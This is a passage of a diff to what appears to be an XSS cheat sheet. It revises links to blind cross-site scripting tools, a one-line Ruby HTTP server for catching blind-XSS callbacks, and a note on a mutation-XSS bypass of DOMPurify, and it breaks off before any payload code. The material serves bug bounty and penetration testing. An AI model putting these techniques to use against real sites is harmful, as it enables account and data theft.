Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) -- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) -- [ezXSS - ssl](https://github.com/ssl/ezXSS) +- [Netflix-Skunkworks/sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework +- [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting. +- [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. ### Blind XSS endpoint @@ -540,20 +540,25 @@ Eg. payload Eg. one-line HTTP server: -``` +```ps1 $ ruby -run -ehttpd . -p8080 ``` ## Mutated XSS -Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. +Use browsers quirks to recreate some HTML tags. -Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. +**Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search. ```javascript